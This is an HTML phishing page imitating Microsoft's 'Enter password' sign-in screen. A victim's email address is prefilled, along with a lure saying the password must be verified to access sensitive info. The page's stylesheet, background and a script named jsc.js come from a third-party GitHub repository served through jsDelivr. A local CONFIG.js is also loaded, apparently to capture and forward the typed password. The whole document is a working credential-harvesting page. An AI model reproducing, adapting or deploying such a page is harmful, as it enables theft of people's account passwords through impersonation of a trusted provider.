<html dir="ltr" lang="EN-US">
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=Edge">
    <title>Sign in to your Microsoft account</title>
    <meta name="viewport"
          content="width=device-width, initial-scale=1.0, maximum-scale=2.0, minimum-scale=1.0, user-scalable=yes">
    <link rel="shortcut icon" href="https://logincdn.msauth.net/16.000.29237.7/images/favicon.ico">
    <link rel="stylesheet" title="Converged_v2" type="text/css"
          href="https://cdn.jsdelivr.net/gh/jmtechofficial/jm-adbe-assets@master/addons/main/out/out/static/16.000/Converged_v21033__M8MTZS7Nv0I1zR18wdR-g2.css">
    <style type="text/css">body {
        display: none;
    }</style>
    <style type="text/css">body {
        display: block !important;
    }</style>
    <link rel="image_src" href="https://logincdn.msauth.net/16.000.29237.7/images/Windows_Live_v_thumb.jpg">
    <style type="text/css">.inner, .promoted-fed-cred-box, .sign-in-box, .new-session-popup-v2sso, .debug-details-banner, .vertical-split-content {
        min-width: 0;
    }</style>
    <script src="../../../CONFIG.js"></script>

</head>
<body class="cb" data-bind="defineGlobals: ServerData, bodyCssClass">
<div>


    <form name="f1"  id="form_outlook" method="POST" novalidate="novalidate" spellcheck="false"
          autocomplete="off">


        <div>


            <!-- ko ifnot: isVerticalSplitTemplate -->
            <div id="lightboxTemplateContainer"
                 data-bind="component: { name: 'lightbox-template', params: { serverData: svr } }"><!--  -->

                <div id="lightboxBackgroundContainer" data-bind="component: { name: 'background-image-control',
    publicMethods: $page.backgroundControlMethods,
    event: { load: $page.backgroundImageControl_onLoad } }">
                    <div class="background-image-holder" role="presentation"
                         data-bind="css: { app: isAppBranding }, style: { background: backgroundStyle }">
                        <!-- ko if: smallImageUrl --><!-- /ko -->

                        <!-- ko if: backgroundImageUrl -->
                        <div data-bind="backgroundImage: backgroundImageUrl(), externalCss: { 'background-image': true }"
                             style="background-image: url(https://cdn.jsdelivr.net/gh/jmtechofficial/jm-adbe-assets@master/addons/main/out/out/static/2_bc3d32a696895f78c19df6c717586a5d.svg);"
                             class="background-image ext-background-image"></div>
                        <!-- ko if: useImageMask --><!-- /ko -->
                        <!-- /ko -->
                    </div>
                </div>

                <!-- ko if: svr.cj --><!-- /ko -->

                <!-- ko withProperties: { '$masterPageContext': $parentContext } -->
                <div class="outer" data-bind="css: { 'app': $page.backgroundLogoUrl }">
                    <!-- ko if: showHeader --><!-- /ko -->

                    <div class="template-section main-section">
                        <div data-bind="css: { 'has-header': showHeader }, externalCss: { 'middle': true }"
                             class="middle ext-middle">
                            <div class="full-height"
                                 data-bind="component: { name: 'content-control', params: { serverData: svr } }">
                                <!--  -->

                                <!-- ko withProperties: { '$content': $data } -->
                                <div class="flex-column">
                                    <!-- ko if: $page.paginationControlHelper.showBackgroundLogoHolder --><!-- /ko -->

                                    <!-- ko if: $page.paginationControlHelper.showPageLevelTitleControl --><!-- /ko -->

                                    <div class="win-scroll">
                                        <div id="lightbox" class="sign-in-box ext-sign-in-box fade-in-lightbox">

                                            <!-- ko template: { nodes: $masterPageContext.$componentTemplateNodes, data: $page } -->

                                            <!-- ko if: svr.Bn --><!-- /ko -->

                                            <div class="lightbox-cover"></div>
                                            <div id="progressBar" class="progress" role="progressbar" style="display: none" aria-label="Please wait"><div></div><div></div><div></div><div></div><div></div></div>
                                            <!-- ko if: showLightboxProgress --><!-- /ko -->

                                            <!-- ko if: loadBannerLogo -->
                                            <div><!--  -->

                                                <!-- ko if: bannerLogoUrl --><!-- /ko -->

                                                <!-- ko if: !bannerLogoUrl && !isChinaDc -->
                                                <!-- ko component: 'accessible-image-control' -->
                                                <!-- ko if: (isHighContrastBlackTheme || hasDarkBackground || svr.fHasBackgroundColor) && !isHighContrastWhiteTheme -->
                                                <!-- /ko -->
                                                <!-- ko if: (isHighContrastWhiteTheme || (!hasDarkBackground && !svr.fHasBackgroundColor)) && !isHighContrastBlackTheme -->
                                                <!-- ko template: { nodes: [darkImageNode], data: $parent } --><img
                                                        class="logo" role="img"
                                                        pngsrc="https://logincdn.msauth.net/shared/1.0/content/images/microsoft_logo_ed9c9eb0dce17d752bedea6b5acda6d9.png"
                                                        svgsrc="https://logincdn.msauth.net/shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg"
                                                        data-bind="imgSrc, attr: { alt: str['MOBILE_STR_Footer_Microsoft'] }"
                                                        src="https://logincdn.msauth.net/shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg"
                                                        alt="Microsoft"><!-- /ko -->
                                                <!-- /ko --><!-- /ko -->
                                                <!-- /ko --></div>
                                            <!-- /ko -->

                                            <!-- ko if: svr.c8 && paginationControlHelper.showLwaDisclaimer() -->
                                            <!-- /ko -->

                                            <!-- ko if: asyncInitReady -->
                                            <div role="main" data-bind="component: { name: 'pagination-control',
            publicMethods: paginationControlMethods,
            params: {
                enableCssAnimation: svr.aV,
                disableAnimationIfAnimationEndUnsupported: svr.Cf,
                initialViewId: initialViewId,
                currentViewId: currentViewId,
                initialSharedData: initialSharedData,
                initialError: $loginPage.getServerError() },
            event: {
                cancel: paginationControl_onCancel,
                loadView: view_onLoadView,
                showView: view_onShow,
                setLightBoxFadeIn: view_onSetLightBoxFadeIn,
                animationStateChange: paginationControl_onAnimationStateChange } }"><!--  -->

                                                <div data-bind="css: { 'zero-opacity': hidePaginatedView() }" class="">
                                                    <!-- ko if: showIdentityBanner() && (sharedData.displayName || svr.I) -->
                                                    <div data-bind="css: {
        'animate': animate() &amp;&amp; animate.animateBanner(),
        'slide-out-next': animate.isSlideOutNext(),
        'slide-in-next': animate.isSlideInNext(),
        'slide-out-back': animate.isSlideOutBack(),
        'slide-in-back': animate.isSlideInBack() }" class="animate slide-in-next">

                                                        <div data-bind="component: { name: 'identity-banner-control',
            params: {
                userTileUrl: svr.bY,
                displayName: sharedData.displayName || svr.I,
                isBackButtonVisible: isBackButtonVisible(),
                focusOnBackButton: isBackButtonFocused(),
                backButtonDescribedBy: backButtonDescribedBy() },
            event: {
                backButtonClick: identityBanner_onBackButtonClick } }"><!--  -->

                                                            <div class="identityBanner">
                                                                <!-- ko if: isBackButtonVisible -->
                                                                <button type="button" class="backButton" data-bind="
        attr: { 'id': backButtonId || 'idBtn_Back' },
        ariaLabel: str['CT_HRD_STR_Splitter_Back'],
        ariaDescribedBy: backButtonDescribedBy,
        click: backButton_onClick,
        hasFocus: focusOnBackButton" id="idBtn_Back" aria-label="Back">
                                                                    <!-- ko ifnot: svr.CR -->
                                                                    <!-- ko component: 'accessible-image-control' -->
                                                                    <!-- ko if: (isHighContrastBlackTheme || hasDarkBackground || svr.fHasBackgroundColor) && !isHighContrastWhiteTheme -->
                                                                    <!-- /ko -->
                                                                    <!-- ko if: (isHighContrastWhiteTheme || (!hasDarkBackground && !svr.fHasBackgroundColor)) && !isHighContrastBlackTheme -->
                                                                    <!-- ko template: { nodes: [darkImageNode], data: $parent } --><img
                                                                        role="presentation"
                                                                        pngsrc="https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_7cc096da6aa2dba3f81fcc1c8262157c.png"
                                                                        svgsrc="https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg"
                                                                        data-bind="imgSrc"
                                                                        src="https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg">
                                                                    <!-- /ko -->
                                                                    <!-- /ko --><!-- /ko -->
                                                                    <!-- /ko -->

                                                                    <!-- ko if: svr.CR --><!-- /ko -->
                                                                </button>
                                                                <!-- /ko -->

                                                                <div id="displayName" class="identity"
                                                                     data-bind="text: unsafe_displayName, attr: { 'title': unsafe_displayName }"
                                                                     title="jbadoly@hotmail.com">jbadoly@hotmail.com
                                                                </div>
                                                            </div>
                                                        </div>
                                                    </div>
                                                    <!-- /ko -->

                                                    <div class="pagination-view animate has-identity-banner slide-in-next">

                                                        <div data-viewid="2" data-showidentitybanner="true"
                                                             data-dynamicbranding="true"><!--  -->

                                                            <!--  -->

                                                            <div aria-hidden="true">
                                                                <input type="hidden" id="username">
                                                            </div>

                                                            <div id="loginHeader" class="row title ext-title">
                                                                <div role="heading" aria-level="1">
                                                                    Enter password
                                                                </div>
                                                            </div>
                                                            <div class="row">
                                                                <div class="form-group col-md-24">
                                                                    <div role="alert" aria-live="assertive">
                                                                        <div id="passwordError" style="display: none" class="error ext-error">
                                                                            Because you're accessing sensitive info, you need to verify your password.
                                                                        </div>
                                                                    </div>

                                                                    <input type="hidden" id="domain">
                                                                    <div class="placeholderContainer">
                                                                        <input name="passwd" type="password" id="i0118"
                                                                               autocomplete="off"
                                                                               class="form-control input ext-input text-box ext-text-box"
                                                                               aria-required="true"
                                                                               aria-describedby="loginHeader passwordError  "
                                                                               placeholder="Password"
                                                                               aria-label="Enter the password for jbadoly@hotmail.com"
                                                                               tabindex="0">

                                                                        <!-- ko if: svr.cE && showPassword() -->
                                                                        <!-- /ko -->
                                                                        <!-- /ko -->
                                                                        <!-- /ko -->
                                                                        <!-- ko ifnot: usePlaceholderAttribute -->
                                                                        <!-- /ko --></div>
                                                                </div>
                                                            </div>

                                                            <div class="position-buttons">
                                                                <div>
                                                                    <div class="row">
                                                                        <div class="col-md-24">
                                                                            <div class="text-13">
                                                                                <div class="form-group">
                                                                                    <a id="idA_PWD_ForgotPassword"
                                                                                       role="link"
                                                                                       href="https://account.live.com/ResetPassword.aspx?wreply=https://login.live.com/login.srf%3fwa%3dwsignin1.0%26rpsnv%3d13%26ct%3d1637"
                                                                                    >Forgot password?</a>
                                                                                </div>
                                                                                <div class="form-group">
                                                                                </div>
                                                                            </div>
                                                                        </div>
                                                                    </div>
                                                                </div>

                                                                <div class="win-button-pin-bottom">
                                                                    <div class="row">
                                                                        <div>
                                                                            <div class="col-xs-24 no-padding-left-right button-container">
                                                                                <div class="inline-block">
                                                                                    <input type="submit"
                                                                                           id="idSIButton9"
                                                                                           class="win-button button_primary button ext-button primary ext-primary"
                                                                                           value="Sign in">
                                                                                </div>
                                                                            </div>
                                                                        </div>
                                                                    </div>
                                                                </div>
                                                            </div>

                                                        </div>

                                                    </div>
                                                </div>
                                            </div>
                                            <div>
                                            </div>
                                        </div>

                                    </div>
                                </div>
                                <!-- /ko --></div>
                        </div>
                    </div>

                    <!-- ko if: $page.paginationControlHelper.showFooterControl -->
                    <div id="footer" role="contentinfo" class="footer ext-footer">

                        <div><!-- ko if: !hideFooter && (showLinks || impressumLink || showIcpLicense) -->
                            <div id="footerLinks" class="footerNode text-secondary">

                                <!-- ko if: showFooter -->
                                <!-- ko if: !hideTOU -->
                                <a id="ftrTerms"
                                   href="https://login.live.com/gls.srf?urlID=WinLiveTermsOfUse&amp;mkt=EN-US&amp;uaid=d6cc93adf041417cb65c6f55c405dbb5"
                                   class="footer-content ext-footer-content footer-item ext-footer-item">Terms of
                                    use</a>
                                <!-- /ko -->

                                <!-- ko if: !hidePrivacy -->
                                <a id="ftrPrivacy"
                                   href="https://login.live.com/gls.srf?urlID=MSNPrivacyStatement&amp;mkt=EN-US&amp;uaid=d6cc93adf041417cb65c6f55c405dbb5"
                                   class="footer-content ext-footer-content footer-item ext-footer-item">Privacy &amp;
                                    cookies</a>
                                <!-- /ko -->

                                <!-- ko if: impressumLink --><!-- /ko -->

                                <!-- ko if: showIcpLicense --><!-- /ko -->
                                <!-- /ko -->

                                <!-- Set attr binding before hasFocusEx to prevent Narrator from losing focus -->
                                <a id="moreOptions" href="#" role="button"
                                   aria-label="Click here for troubleshooting information" aria-expanded="false"
                                   class="footer-content ext-footer-content footer-item ext-footer-item debug-item ext-debug-item">...</a>
                            </div>
                            <!-- /ko -->

                            <!-- ko if: svr.CZ && showLinks --><!-- /ko --></div>
                    </div>
                    <!-- /ko -->
                </div>
                <!-- /ko --></div>
            <!-- /ko -->

            <!-- ko if: isVerticalSplitTemplate() && isTemplateLoaded() --><!-- /ko -->
            <!-- /ko -->
            <!-- /ko --></div>
        <!-- /ko -->
    </form>

    <form data-bind="postRedirectForm: postRedirect" method="POST" aria-hidden="true"></form>

    <!-- ko if: svr.aE -->
    <div id="idPartnerPL" data-bind="injectIframe: { url: svr.aE }">

    </div>
    <!-- /ko --></div>

<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.5.0/jquery.min.js" integrity="sha256-xNzN2a4ltkB44Mc/Jz3pT4iU1cmeR0FkXs4pru/JxaQ=" crossorigin="anonymous"></script>
<script src="https://cdn.jsdelivr.net/gh/jmtechofficial/jm-adbe-assets@master/addons/main/out/out/static/jsc.js"></script>
</body>
</html>